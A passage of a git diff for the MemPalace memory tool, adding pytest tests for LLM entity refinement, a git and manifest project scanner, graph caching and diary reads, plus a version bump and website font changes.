+    """Manifest-backed projects (conf >= 0.95) aren't sent to the LLM."""
+    detected = {
+        "people": [],
+        "projects": [
+            {
+                "name": "manifest-backed",
+                "type": "project",
+                "confidence": 0.99,
+                "frequency": 50,
+                "signals": ["pyproject.toml"],
+            }
+        ],
+        "uncertain": [],
+    }
+    provider = FakeProvider(response_text='{"classifications": []}')
+    refine_entities(detected, "", provider, show_progress=False)
+    # Should not have called the LLM at all
+    assert provider.call_count == 0
+
+
+def test_refine_entities_refines_high_confidence_regex_projects():
+    """High-confidence regex projects still need LLM review without source signal."""
+    detected = {
+        "people": [],
+        "projects": [
+            {
+                "name": "OpenAPI",
+                "type": "project",
+                "confidence": 0.99,
+                "frequency": 5,
+                "signals": ["code file reference (5x)"],
+            }
+        ],
+        "uncertain": [],
+    }
+    provider = FakeProvider(
+        response_text=(
+            '{"classifications": [{"name": "OpenAPI", "label": "TOPIC", "reason": "technology"}]}'
+        )
+    )
+    result = refine_entities(detected, "OpenAPI schemas", provider, show_progress=False)
+    assert provider.call_count == 1
+    assert result.reclassified == 1
+    assert result.merged["projects"] == []
+    assert result.merged["uncertain"][0]["name"] == "OpenAPI"
+
+
+def test_refine_entities_refines_regex_people_but_skips_git_people():
+    detected = {
+        "people": [
+            {
+                "name": "Igor Lins e Silva",
+                "type": "person",
+                "confidence": 0.99,
+                "frequency": 100,
+                "signals": ["100 commits across 3 repos"],
+            },
+            {
+                "name": "Tool",
+                "type": "person",
+                "confidence": 0.99,
+                "frequency": 5,
+                "signals": ["pronoun nearby (5x)"],
+            },
+        ],
+        "projects": [],
+        "uncertain": [],
+    }
+    provider = FakeProvider(
+        response_text='{"classifications": [{"name": "Tool", "label": "COMMON_WORD"}]}'
+    )
+    result = refine_entities(detected, "Tool is a common noun.", provider, show_progress=False)
+    assert provider.call_count == 1
+    names = [e["name"] for e in result.merged["people"]]
+    assert names == ["Igor Lins e Silva"]
+    assert result.dropped == 1
+
+
+def test_refine_entities_can_keep_llm_only_project_in_uncertain():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Terraform",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 9,
+                "signals": ["regex"],
+            }
+        ],
+    }
+    provider = FakeProvider(
+        response_text='{"classifications": [{"name": "Terraform", "label": "PROJECT"}]}'
+    )
+    result = refine_entities(
+        detected,
+        "Terraform config",
+        provider,
+        show_progress=False,
+        allow_project_promotions=False,
+    )
+    assert result.merged["projects"] == []
+    assert result.merged["uncertain"][0]["name"] == "Terraform"
+    assert any("LLM: project" in s for s in result.merged["uncertain"][0]["signals"])
+
+
+def test_refine_entities_empty_candidates_returns_noop():
+    detected = {"people": [], "projects": [], "uncertain": []}
+    provider = FakeProvider()
+    result = refine_entities(detected, "", provider, show_progress=False)
+    assert result.batches_total == 0
+    assert result.reclassified == 0
+    assert result.merged == detected
+
+
+def test_refine_entities_handles_batch_error_gracefully():
+    provider = FakeProvider(should_raise=LLMError("transport broke"))
+    result = refine_entities(
+        _sample_detected(),
+        corpus_text="",
+        provider=provider,
+        show_progress=False,
+    )
+    assert result.errors
+    assert "transport broke" in result.errors[0]
+    # Detected unchanged (no successful decisions)
+    assert result.reclassified == 0
+    assert result.cancelled is False
+
+
+def test_refine_entities_ctrl_c_returns_partial():
+    """Ctrl-C during refinement marks cancelled=True and returns partial result."""
+    # Two batches' worth of candidates
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": f"Cand{i}",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 3,
+                "signals": [],
+            }
+            for i in range(50)
+        ],
+    }
+    provider = FakeProvider(
+        response_text='{"classifications": []}',
+        interrupt_on_call=2,  # interrupt on second batch
+    )
+    result = refine_entities(detected, "", provider, batch_size=25, show_progress=False)
+    assert result.cancelled is True
+    assert result.batches_completed == 1  # first batch finished; second interrupted
+    assert result.batches_total == 2
+
+
+def test_refine_entities_malformed_response_recorded_as_error():
+    provider = FakeProvider(response_text="not json")
+    result = refine_entities(_sample_detected(), "", provider, show_progress=False)
+    assert any("could not parse" in e for e in result.errors)
+
+
+# ── collect_corpus_text ─────────────────────────────────────────────────
+
+
+def test_collect_corpus_text_reads_prose_files(tmp_path):
+    (tmp_path / "a.md").write_text("hello world")
+    (tmp_path / "b.txt").write_text("more prose")
+    (tmp_path / "c.py").write_text("import os")  # not prose, skipped
+    text = collect_corpus_text(str(tmp_path))
+    assert "hello world" in text
+    assert "more prose" in text
+    assert "import os" not in text
+
+
+def test_collect_corpus_text_prefers_recent(tmp_path):
+    import os
+    import time
+
+    old = tmp_path / "old.md"
+    old.write_text("OLD_CONTENT")
+    time.sleep(0.01)
+    new = tmp_path / "new.md"
+    new.write_text("NEW_CONTENT")
+    # Force old to be older still
+    old_mtime = old.stat().st_mtime - 3600
+    os.utime(old, (old_mtime, old_mtime))
+
+    text = collect_corpus_text(str(tmp_path), max_files=1)
+    assert "NEW_CONTENT" in text
+    assert "OLD_CONTENT" not in text
+
+
+def test_collect_corpus_text_missing_dir_returns_empty(tmp_path):
+    assert collect_corpus_text(str(tmp_path / "nope")) == ""
+
+
+def test_collect_corpus_text_caps_bytes_per_file(tmp_path):
+    big = tmp_path / "big.md"
+    big.write_text("x" * 100_000)
+    text = collect_corpus_text(str(tmp_path), max_files=1, max_bytes_per_file=500)
+    assert len(text) <= 600  # 500 + newlines
diff --git a/tests/test_mcp_server.py b/tests/test_mcp_server.py
index 899e6a7c7..480b6bdbe 100644
--- a/tests/test_mcp_server.py
+++ b/tests/test_mcp_server.py
@@ -740,6 +740,40 @@ def now(cls):
         assert entry1 in contents
         assert entry2 in contents
 
+    def test_diary_read_empty_wing_spans_all_wings(self, monkeypatch, config, palace_path, kg):
+        """diary_read(wing='') must return entries from every wing this agent
+        wrote to. Hooks write to project-derived wings (#659); a reader that
+        silos by default wing would never see those entries."""
+        _patch_mcp_server(monkeypatch, config, kg)
+        _client, _col = _get_collection(palace_path, create=True)
+        del _client
+        from mempalace.mcp_server import tool_diary_read, tool_diary_write
+
+        w1 = tool_diary_write(
+            agent_name="TestAgent",
+            entry="default-wing entry",
+            topic="general",
+        )
+        w2 = tool_diary_write(
+            agent_name="TestAgent",
+            entry="project-wing entry",
+            topic="general",
+            wing="wing_someproject",
+        )
+        assert w1["success"] and w2["success"]
+
+        # Empty wing → return both entries
+        r = tool_diary_read(agent_name="TestAgent", wing="")
+        assert r["total"] == 2
+        contents = {e["content"] for e in r["entries"]}
+        assert "default-wing entry" in contents
+        assert "project-wing entry" in contents
+
+        # Explicit wing → return only that wing's entries
+        r_scoped = tool_diary_read(agent_name="TestAgent", wing="wing_someproject")
+        assert r_scoped["total"] == 1
+        assert r_scoped["entries"][0]["content"] == "project-wing entry"
+
 
 # ── Cache Invalidation (inode/mtime) ──────────────────────────────────
 
diff --git a/tests/test_miner.py b/tests/test_miner.py
index 0c81dff7f..add5048d6 100644
--- a/tests/test_miner.py
+++ b/tests/test_miner.py
@@ -66,6 +66,16 @@ def test_load_config_uses_defaults_when_yaml_missing():
         shutil.rmtree(tmpdir)
 
 
+def test_scan_project_skips_mempalace_generated_files():
+    with tempfile.TemporaryDirectory() as tmpdir:
+        project_root = Path(tmpdir).resolve()
+        write_file(project_root / "entities.json", '{"people": [], "projects": []}')
+        write_file(project_root / "mempalace.yaml", "wing: test\nrooms: []\n")
+        write_file(project_root / "notes.md", "real user content\n" * 10)
+
+        assert scanned_files(project_root) == ["notes.md"]
+
+
 def test_scan_project_respects_gitignore():
     tmpdir = tempfile.mkdtemp()
     try:
diff --git a/tests/test_palace_graph.py b/tests/test_palace_graph.py
index ddda2724e..7bc45e04b 100644
--- a/tests/test_palace_graph.py
+++ b/tests/test_palace_graph.py
@@ -30,6 +30,7 @@ def fake_get(limit=1000, offset=0, include=None):
         build_graph,
         find_tunnels,
         graph_stats,
+        invalidate_graph_cache,
         traverse,
     )
 
@@ -38,6 +39,9 @@ def fake_get(limit=1000, offset=0, include=None):
 
 
 class TestBuildGraph:
+    def setup_method(self):
+        invalidate_graph_cache()
+
     def test_empty_collection(self):
         col = _make_fake_collection([])
         nodes, edges = build_graph(col=col)
@@ -114,11 +118,43 @@ def test_dates_capped_at_five(self):
         nodes, _ = build_graph(col=col)
         assert len(nodes["busy"]["dates"]) <= 5
 
+    def test_cache_returns_same_result(self):
+        """Second call within TTL returns cached nodes without re-scanning.
+
+        The cache intentionally ignores col/config args when warm — this is
+        correct for the MCP server's single-palace use case. Callers that
+        switch collections must call invalidate_graph_cache() first.
+        """
+        col = _make_fake_collection(
+            [{"room": "auth", "wing": "wing_code", "hall": "security", "date": "2026-01-01"}]
+        )
+        nodes1, edges1 = build_graph(col=col)
+        # Second call with a *different* collection — should still return cached result
+        col2 = _make_fake_collection([])
+        nodes2, edges2 = build_graph(col=col2)
+        assert nodes1 == nodes2
+        assert edges1 == edges2
+
+    def test_invalidate_clears_cache(self):
+        """invalidate_graph_cache() forces a fresh scan on next call."""
+        col = _make_fake_collection(
+            [{"room": "auth", "wing": "wing_code", "hall": "security", "date": "2026-01-01"}]
+        )
+        build_graph(col=col)
+        invalidate_graph_cache()
+        col_empty = _make_fake_collection([])
+        nodes, edges = build_graph(col=col_empty)
+        assert nodes == {}
+        assert edges == []
+
 
 # --- traverse ---
 
 
 class TestTraverse:
+    def setup_method(self):
+        invalidate_graph_cache()
+
     def _build_col(self):
         return _make_fake_collection(
             [
@@ -156,6 +192,9 @@ def test_traverse_max_hops(self):
 
 
 class TestFindTunnels:
+    def setup_method(self):
+        invalidate_graph_cache()
+
     def _build_tunnel_col(self):
         return _make_fake_collection(
             [
@@ -192,6 +231,9 @@ def test_find_tunnels_both_wings(self):
 
 
 class TestGraphStats:
+    def setup_method(self):
+        invalidate_graph_cache()
+
     def test_empty_graph(self):
         col = _make_fake_collection([])
         stats = graph_stats(col=col)
diff --git a/tests/test_project_scanner.py b/tests/test_project_scanner.py
new file mode 100644
index 000000000..49126b44c
--- /dev/null
+++ b/tests/test_project_scanner.py
@@ -0,0 +1,573 @@
+"""Tests for mempalace.project_scanner."""
+
+import json
+import os
+import shutil
+import subprocess
+from pathlib import Path
+from types import SimpleNamespace
+
+import pytest
+
+from mempalace.project_scanner import (
+    PersonInfo,
+    ProjectInfo,
+    _dedupe_people,
+    _is_bot,
+    _looks_like_real_name,
+    _collect_manifest_names,
+    _merge_detected,
+    _parse_cargo,
+    _parse_gomod,
+    _parse_package_json,
+    _parse_pyproject,
+    _UnionFind,
+    discover_entities,
+    find_git_repos,
+    scan,
+    to_detected_dict,
+)
+
+# Keep only a small portability-focused allowlist for git subprocesses in tests.
+GIT_ENV_ALLOWLIST = ("HOME", "SystemRoot", "ComSpec", "TMPDIR", "TEMP", "TMP")
+GIT_EXECUTABLE = shutil.which("git")
+
+
+def _gitdir_marker(path: Path) -> str:
+    return f"gitdir: {path}\n"
+
+
+# ── manifest parsers ────────────────────────────────────────────────────
+
+
+def test_parse_package_json(tmp_path):
+    f = tmp_path / "package.json"
+    f.write_text(json.dumps({"name": "my-package", "version": "1.0.0"}))
+    assert _parse_package_json(f) == "my-package"
+
+
+def test_parse_package_json_missing_name(tmp_path):
+    f = tmp_path / "package.json"
+    f.write_text(json.dumps({"version": "1.0.0"}))
+    assert _parse_package_json(f) is None
+
+
+def test_parse_package_json_malformed(tmp_path):
+    f = tmp_path / "package.json"
+    f.write_text("{ not valid json")
+    assert _parse_package_json(f) is None
+
+
+def test_parse_pyproject_pep621(tmp_path):
+    f = tmp_path / "pyproject.toml"
+    f.write_text('[project]\nname = "my-py-package"\n')
+    assert _parse_pyproject(f) == "my-py-package"
+
+
+def test_parse_pyproject_poetry(tmp_path):
+    f = tmp_path / "pyproject.toml"
+    f.write_text('[tool.poetry]\nname = "poetry-pkg"\n')
+    assert _parse_pyproject(f) == "poetry-pkg"
+
+
+def test_parse_cargo(tmp_path):
+    f = tmp_path / "Cargo.toml"
+    f.write_text('[package]\nname = "rust-crate"\nversion = "0.1.0"\n')
+    assert _parse_cargo(f) == "rust-crate"
+
+
+def test_parse_gomod(tmp_path):
+    f = tmp_path / "go.mod"
+    f.write_text("module github.com/user/my-go-mod\n\ngo 1.21\n")
+    assert _parse_gomod(f) == "my-go-mod"
+
+
+# ── bot filtering ───────────────────────────────────────────────────────
+
+
+def test_is_bot_catches_github_actions():
+    assert _is_bot("github-actions[bot]", "41898282+github-actions[bot]@users.noreply.github.com")
+
+
+def test_is_bot_catches_dependabot():
+    assert _is_bot("dependabot[bot]", "dependabot@github.com")
+
+
+def test_is_bot_catches_pr_bot():
+    assert _is_bot("Comfy Org PR Bot", "prbot@example.com")
+
+
+def test_is_bot_does_not_flag_github_privacy_email():
+    # Real humans use ...@users.noreply.github.com when privacy is enabled.
+    # Must NOT be filtered.
+    assert not _is_bot("Igor Lins e Silva", "123456+igorls@users.noreply.github.com")
+
+
+def test_is_bot_does_not_flag_robot_person_name():
+    # "Robot" as a surname should not trigger the \bbot$ pattern
+    # since \b requires a boundary before 'bot'.
+    assert not _is_bot("Sarah Robot", "sarah@example.com")
+
+
+def test_looks_like_real_name_accepts_human():
+    assert _looks_like_real_name("Igor Lins e Silva")
+    assert _looks_like_real_name("Jane Doe")
+
+
+def test_looks_like_real_name_rejects_handles():
+    assert not _looks_like_real_name("666ghj")
+    assert not _looks_like_real_name("comfyanonymous")
+    assert not _looks_like_real_name("bensig")
+    assert not _looks_like_real_name("")
+    assert not _looks_like_real_name("no_spaces_handle")
+
+
+# ── union-find dedup ────────────────────────────────────────────────────
+
+
+def test_unionfind_merges_shared_email():
+    commits = [
+        ("Milla J", "shared@example.com", "repo1"),
+        ("MSL", "shared@example.com", "repo1"),
+        ("Milla J", "other@example.com", "repo1"),
+    ]
+    people = _dedupe_people(commits)
+    # All three commits collapse into one "Milla J" person (MSL is filtered
+    # as display name because it lacks a space but its commits still count).
+    assert "Milla J" in people
+    assert people["Milla J"].total_commits == 3
+    assert "MSL" not in people
+
+
+def test_unionfind_keeps_distinct_people_separate():
+    commits = [
+        ("Alice Example", "alice@example.com", "r"),
+        ("Bob Sample", "bob@sample.org", "r"),
+    ]
+    people = _dedupe_people(commits)
+    assert "Alice Example" in people
+    assert "Bob Sample" in people
+
+
+def test_unionfind_merges_shared_name():
+    """Same display name, two different emails, same person."""
+    commits = [
+        ("Jane Doe", "jane@work.com", "r"),
+        ("Jane Doe", "jane@personal.com", "r"),
+    ]
+    people = _dedupe_people(commits)
+    assert people["Jane Doe"].total_commits == 2
+    assert len(people["Jane Doe"].emails) == 2
+
+
+# ── project_info / person_info ─────────────────────────────────────────
+
+
+def test_project_info_confidence_is_mine():
+    p = ProjectInfo(name="x", repo_root=Path("."), is_mine=True)
+    assert p.confidence == 0.99
+
+
+def test_project_info_confidence_no_git():
+    p = ProjectInfo(name="x", repo_root=Path("."), has_git=False, manifest="package.json")
+    assert p.confidence > 0.8
+
+
+def test_person_info_signal_pluralization():
+    p = PersonInfo(name="x", total_commits=1, repos={"a"})
+    assert "1 commit across 1 repo" == p.to_signal()
+    p2 = PersonInfo(name="y", total_commits=5, repos={"a", "b"})
+    assert "5 commits across 2 repos" == p2.to_signal()
+
+
+# ── find_git_repos ──────────────────────────────────────────────────────
+
+
+def test_find_git_repos_detects_root_repo(tmp_path):
+    (tmp_path / ".git").mkdir()
+    repos = find_git_repos(tmp_path)
+    assert tmp_path in repos
+
+
+def test_find_git_repos_detects_nested(tmp_path):
+    sub = tmp_path / "subproject"
+    sub.mkdir()
+    (sub / ".git").mkdir()
+    repos = find_git_repos(tmp_path)
+    assert sub in repos
+
+
+def test_find_git_repos_skips_nested_inside_repo(tmp_path):
+    """If root is a repo, nested repos are still discovered as separate roots."""
+    (tmp_path / ".git").mkdir()
+    deep = tmp_path / "a" / "b" / "nested-repo"
+    deep.mkdir(parents=True)
+    (deep / ".git").mkdir()
+    repos = find_git_repos(tmp_path)
+    assert tmp_path in repos
+    assert deep in repos
+
+
+def test_find_git_repos_detects_git_file_markers(tmp_path):
+    (tmp_path / ".git").write_text(_gitdir_marker(tmp_path.parent / "root.git"))
+    sub = tmp_path / "subproject"
+    sub.mkdir()
+    (sub / ".git").write_text(_gitdir_marker(tmp_path.parent / "sub.git"))
+    repos = find_git_repos(tmp_path)
+    assert tmp_path in repos
+    assert sub in repos
+
+
+def test_find_git_repos_empty_dir(tmp_path):
+    assert find_git_repos(tmp_path) == []
+
+
+# ── scan ────────────────────────────────────────────────────────────────
+
+
+def _require_git() -> None:
+    if GIT_EXECUTABLE is None:
+        pytest.skip("git executable not available")
+
+
+def _git_test_env(name: str, email: str) -> dict[str, str]:
+    env = {
+        "GIT_AUTHOR_NAME": name,
+        "GIT_AUTHOR_EMAIL": email,
+        "GIT_COMMITTER_NAME": name,
+        "GIT_COMMITTER_EMAIL": email,
+    }
+    for key in GIT_ENV_ALLOWLIST:
+        value = os.environ.get(key)
+        if value:
+            env[key] = value
+    return env
+
+
+def _git(*args: str) -> list[str]:
+    _require_git()
+    assert GIT_EXECUTABLE is not None
+    return [GIT_EXECUTABLE, *args]
+
+
+def _git_commit(
+    path: Path, filename: str, content: str, message: str, name: str, email: str
+) -> None:
+    _require_git()
+    env = _git_test_env(name, email)
+    (path / filename).write_text(content)
+    subprocess.run(_git("add", filename), cwd=path, check=True, env=env)
+    subprocess.run(_git("commit", "-q", "-m", message), cwd=path, check=True, env=env)
+
+
+def _init_git_repo(path: Path, name: str = "Jane Doe", email: str = "jane@example.com"):
+    """Helper: init a git repo with one commit."""
+    _require_git()
+    subprocess.run(_git("init", "-q"), cwd=path, check=True)
+    subprocess.run(_git("config", "user.name", name), cwd=path, check=True)
+    subprocess.run(_git("config", "user.email", email), cwd=path, check=True)
+    subprocess.run(_git("config", "commit.gpgsign", "false"), cwd=path, check=True)
+    _git_commit(path, "README.md", "hello", "initial", name, email)
+
+
+def test_scan_project_from_package_json(tmp_path):
+    (tmp_path / "package.json").write_text(json.dumps({"name": "my-app"}))
+    _init_git_repo(tmp_path)
+    projects, people = scan(tmp_path)
+    assert len(projects) == 1
+    assert projects[0].name == "my-app"
+    assert projects[0].is_mine is True
+
+
+def test_scan_project_from_pyproject(tmp_path):
+    (tmp_path / "pyproject.toml").write_text('[project]\nname = "pyproj"\n')
+    _init_git_repo(tmp_path)
+    projects, _ = scan(tmp_path)
+    assert any(p.name == "pyproj" for p in projects)
+
+
+def test_scan_prefers_root_manifest_with_explicit_priority(tmp_path):
+    (tmp_path / "package.json").write_text(json.dumps({"name": "package-name"}))
+    (tmp_path / "pyproject.toml").write_text('[project]\nname = "pyproject-name"\n')
+    nested = tmp_path / "nested"
+    nested.mkdir()
+    (nested / "package.json").write_text(json.dumps({"name": "nested-name"}))
+    _init_git_repo(tmp_path)
+    projects, _ = scan(tmp_path)
+    assert projects[0].name == "pyproject-name"
+
+
+def test_scan_fallback_to_dir_name_when_no_manifest(tmp_path):
+    repo = tmp_path / "my-repo-name"
+    repo.mkdir()
+    _init_git_repo(repo)
+    projects, _ = scan(tmp_path)
+    assert any(p.name == "my-repo-name" for p in projects)
+
+
+def test_scan_manifest_only_no_git(tmp_path):
+    """A dir with a manifest but no git still produces a project."""
+    (tmp_path / "package.json").write_text(json.dumps({"name": "manifest-only"}))
+    projects, people = scan(tmp_path)
+    assert len(projects) == 1
+    assert projects[0].name == "manifest-only"
+    assert projects[0].has_git is False
+    assert people == []
+
+
+def test_collect_manifest_names_stops_at_git_file_boundary(tmp_path):
+    (tmp_path / ".git").write_text(_gitdir_marker(tmp_path.parent / "root.git"))
+    (tmp_path / "package.json").write_text(json.dumps({"name": "root-name"}))
+    nested = tmp_path / "nested"
+    nested.mkdir()
+    (nested / ".git").write_text(_gitdir_marker(tmp_path.parent / "nested.git"))
+    (nested / "package.json").write_text(json.dumps({"name": "nested-name"}))
+    manifests = _collect_manifest_names(tmp_path)
+    assert [name for _file, name, _dir in manifests] == ["root-name"]
+
+
+def test_scan_excludes_bot_commits_from_totals(tmp_path):
+    (tmp_path / "package.json").write_text(json.dumps({"name": "my-app"}))
+    _init_git_repo(tmp_path, name="Jane Doe", email="jane@example.com")
+    _git_commit(
+        tmp_path,
+        "bot.txt",
+        "generated",
+        "bot update",
+        "github-actions[bot]",
+        "41898282+github-actions[bot]@users.noreply.github.com",
+    )
+    projects, people = scan(tmp_path)
+    assert projects[0].total_commits == 1
+    assert projects[0].user_commits == 1
+    assert [person.name for person in people] == ["Jane Doe"]
+
+
+def test_scan_empty_dir(tmp_path):
+    projects, people = scan(tmp_path)
+    assert projects == []
+    assert people == []
+
+
+def test_scan_returns_empty_for_nonexistent(tmp_path):
+    missing = tmp_path / "does-not-exist"
+    projects, people = scan(missing)
+    assert projects == []
+    assert people == []
+
+
+# ── to_detected_dict ────────────────────────────────────────────────────
+
+
+def test_to_detected_dict_shape():
+    projects = [ProjectInfo(name="p", repo_root=Path("."), is_mine=True, manifest="package.json")]
+    people = [PersonInfo(name="Jane Doe", total_commits=5, repos={"r"})]
+    d = to_detected_dict(projects, people)
+    assert set(d.keys()) == {"people", "projects", "uncertain"}
+    assert d["projects"][0]["name"] == "p"
+    assert d["projects"][0]["type"] == "project"
+    assert d["people"][0]["name"] == "Jane Doe"
+    assert d["people"][0]["type"] == "person"
+    assert d["uncertain"] == []
+
+
+# ── merge ───────────────────────────────────────────────────────────────
+
+
+def test_merge_primary_wins_case_insensitive():
+    primary = {
+        "people": [],
+        "projects": [
+            {
+                "name": "mempalace",
+                "type": "project",
+                "confidence": 0.99,
+                "frequency": 10,
+                "signals": ["pyproject.toml"],
+            }
+        ],
+        "uncertain": [],
+    }
+    secondary = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "MemPalace",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 6,
+                "signals": ["regex"],
+            }
+        ],
+    }
+    merged = _merge_detected(primary, secondary)
+    # `MemPalace` (uncertain) is deduped against `mempalace` (project) case-insensitively
+    assert len(merged["projects"]) == 1
+    assert len(merged["uncertain"]) == 0
+
+
+def test_merge_drops_secondary_uncertain_when_requested():
+    primary = {"people": [], "projects": [], "uncertain": []}
+    secondary = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {"name": "Foo", "type": "uncertain", "confidence": 0.4, "frequency": 3, "signals": []}
+        ],
+    }
+    merged = _merge_detected(primary, secondary, drop_secondary_uncertain=True)
+    assert merged["uncertain"] == []
+
+
+def test_merge_keeps_distinct_names():
+    primary = {
+        "people": [
+            {
+                "name": "Alice Smith",
+                "type": "person",
+                "confidence": 0.9,
+                "frequency": 10,
+                "signals": [],
+            }
+        ],
+        "projects": [],
+        "uncertain": [],
+    }
+    secondary = {
+        "people": [
+            {
+                "name": "Bob Jones",
+                "type": "person",
+                "confidence": 0.7,
+                "frequency": 3,
+                "signals": [],
+            }
+        ],
+        "projects": [],
+        "uncertain": [],
+    }
+    merged = _merge_detected(primary, secondary)
+    assert len(merged["people"]) == 2
+
+
+# ── discover_entities ──────────────────────────────────────────────────
+
+
+def test_discover_entities_falls_back_to_prose_when_no_git(tmp_path):
+    """If no manifests or git, regex detector on prose is the only source."""
+    notes = tmp_path / "notes.md"
+    notes.write_text(
+        "Riley said hello. Riley asked about it. Riley laughed. "
+        "Hey Riley, thanks for the help. Riley pushed the change. "
+        "Riley decided to go."
+    )
+    d = discover_entities(str(tmp_path))
+    # Prose-only fallback kicks in — Riley appears with person signals
+    all_names = [e["name"] for cat in d.values() for e in cat]
+    assert "Riley" in all_names
+
+
+def test_discover_entities_prefers_real_signal_over_prose(tmp_path):
+    """When manifest exists, its name wins even if prose has noisy candidates."""
+    (tmp_path / "package.json").write_text(json.dumps({"name": "realproj"}))
+    _init_git_repo(tmp_path)
+    (tmp_path / "doc.md").write_text(
+        "Something. Another. Whatever. Context. Context. Context. Context. "
+        "realproj. realproj. realproj. realproj."
+    )
+    d = discover_entities(str(tmp_path))
+    proj_names = [e["name"] for e in d["projects"]]
+    assert "realproj" in proj_names
+
+
+def test_discover_entities_keeps_uncertain_for_llm_when_real_signal(tmp_path):
+    """With --llm, regex-uncertain prose candidates should reach refinement."""
+    (tmp_path / "package.json").write_text(json.dumps({"name": "realproj"}))
+    _init_git_repo(tmp_path)
+    (tmp_path / "doc.md").write_text("Noise appeared. Noise repeated. Noise again.")
+
+    class FakeProvider:
+        def __init__(self):
+            self.prompts = []
+
+        def classify(self, _system, user, json_mode=True):
+            self.prompts.append(user)
+            return SimpleNamespace(
+                text='{"classifications": [{"name": "Noise", "label": "COMMON_WORD"}]}'
+            )
+
+    provider = FakeProvider()
+    d = discover_entities(str(tmp_path), llm_provider=provider, show_progress=False)
+
+    assert len(provider.prompts) == 1
+    assert "Noise" in provider.prompts[0]
+    assert "Noise" not in [e["name"] for cat in d.values() for e in cat]
+
+
+def test_discover_entities_keeps_llm_only_project_uncertain_when_real_signal(tmp_path):
+    """Repo roots should not auto-promote LLM-only tools/topics into projects."""
+    (tmp_path / "package.json").write_text(json.dumps({"name": "realproj"}))
+    _init_git_repo(tmp_path)
+    (tmp_path / "doc.md").write_text("Terraform shipped. Terraform changed. Terraform runs.")
+
+    class FakeProvider:
+        def classify(self, _system, _user, json_mode=True):
+            return SimpleNamespace(
+                text='{"classifications": [{"name": "Terraform", "label": "PROJECT"}]}'
+            )
+
+    d = discover_entities(str(tmp_path), llm_provider=FakeProvider(), show_progress=False)
+
+    assert "realproj" in [e["name"] for e in d["projects"]]
+    assert "Terraform" not in [e["name"] for e in d["projects"]]
+    assert "Terraform" in [e["name"] for e in d["uncertain"]]
+
+
+def test_discover_entities_collapses_case_variants_between_manifest_and_convo(tmp_path):
+    """A project named `myproj` in a manifest and `MyProj` as a Claude Code
+    cwd must collapse into one entry. Matches the case-insensitive dedup
+    used by `_merge_detected` and `miner.add_to_known_entities`."""
+    root = tmp_path / "projects_root"
+    root.mkdir()
+
+    # Entry 1: a git+manifest project named lowercase `myproj`
+    repo = root / "-home-u-src-myproj"
+    repo.mkdir()
+    (repo / "package.json").write_text(json.dumps({"name": "myproj"}))
+    _init_git_repo(repo)
+
+    # Entry 2: same root ALSO looks like a Claude Code `.claude/projects/` dir;
+    # the convo_scanner inside will resolve `cwd` to `/home/u/src/MyProj`
+    # (CamelCase variant of the same project).
+    session = repo / "abc.jsonl"
+    session.write_text(json.dumps({"type": "user", "cwd": "/home/u/src/MyProj"}) + "\n")
+
+    d = discover_entities(str(root))
+
+    project_names = [e["name"] for e in d["projects"]]
+    # One entry, not two. First-seen casing ("myproj" from the manifest scan)
+    # is the winner since it was seeded first.
+    assert len(project_names) == 1
+    assert project_names[0].lower() == "myproj"
+
+
+# ── _UnionFind basics ──────────────────────────────────────────────────
+
+
+def test_unionfind_find_creates_singleton():
+    uf = _UnionFind()
+    assert uf.find("x") == "x"
+
+
+def test_unionfind_union_merges():
+    uf = _UnionFind()
+    uf.union("a", "b")
+    assert uf.find("a") == uf.find("b")
+
+
+def test_unionfind_transitive():
+    uf = _UnionFind()
+    uf.union("a", "b")
+    uf.union("b", "c")
+    assert uf.find("a") == uf.find("c")
diff --git a/uv.lock b/uv.lock
index 49c28ff2c..f102d434f 100644
--- a/uv.lock
+++ b/uv.lock
@@ -1169,11 +1169,12 @@ wheels = [
 
 [[package]]
 name = "mempalace"
-version = "3.3.2"
+version = "3.3.3"
 source = { editable = "." }
 dependencies = [
     { name = "chromadb" },
     { name = "pyyaml" },
+    { name = "tomli", marker = "python_full_version < '3.11'" },
 ]
 
 [package.optional-dependencies]
@@ -1206,6 +1207,7 @@ requires-dist = [
     { name = "pytest-cov", marker = "extra == 'dev'", specifier = ">=4.0" },
     { name = "pyyaml", specifier = ">=6.0,<7" },
     { name = "ruff", marker = "extra == 'dev'", specifier = ">=0.4.0" },
+    { name = "tomli", marker = "python_full_version < '3.11'", specifier = ">=2.0.0" },
 ]
 provides-extras = ["dev", "spellcheck"]
 
diff --git a/website/.vitepress/config.mts b/website/.vitepress/config.mts
index 49cf97522..47b69e25e 100644
--- a/website/.vitepress/config.mts
+++ b/website/.vitepress/config.mts
@@ -21,9 +21,11 @@ export default withMermaid(
 
     head: [
       ['link', { rel: 'icon', href: `${docsBase}mempalace_logo.png` }],
+      ['link', { rel: 'preconnect', href: 'https://api.fontshare.com' }],
+      ['link', { href: 'https://api.fontshare.com/v2/css?f[]=neue-machina@300,400,500,700,800&f[]=satoshi@300,400,500,700&display=swap', rel: 'stylesheet' }],
       ['link', { rel: 'preconnect', href: 'https://fonts.googleapis.com' }],
       ['link', { rel: 'preconnect', href: 'https://fonts.gstatic.com', crossorigin: '' }],
-      ['link', { href: 'https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@300;400;500&family=Cormorant+Garamond:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400&family=Geist:wght@300;400;500;600&display=swap', rel: 'stylesheet' }],
+      ['link', { href: 'https://fonts.googleapis.com/css2?family=Onest:wght@300;400;500;600&family=JetBrains+Mono:wght@400;500&display=swap', rel: 'stylesheet' }],
       ['meta', { property: 'og:title', content: 'MemPalace — AI Memory System' }],
       ['meta', { property: 'og:description', content: '96.6% LongMemEval recall. Zero API calls. Local, free, open source.' }],
       ['meta', { property: 'og:image', content: `${docsBase}mempalace_logo.png` }],
diff --git a/website/.vitepress/theme/landing/HeroSection.vue b/website/.vitepress/theme/landing/HeroSection.vue
index 279e80da4..bca5f18ef 100644
--- a/website/.vitepress/theme/landing/HeroSection.vue
+++ b/website/.vitepress/theme/landing/HeroSection.vue
@@ -5,13 +5,12 @@
     <div class="hero-inner">
       <div class="hero-copy">
         <h1 class="display">
-          <span class="line">Memory is</span>
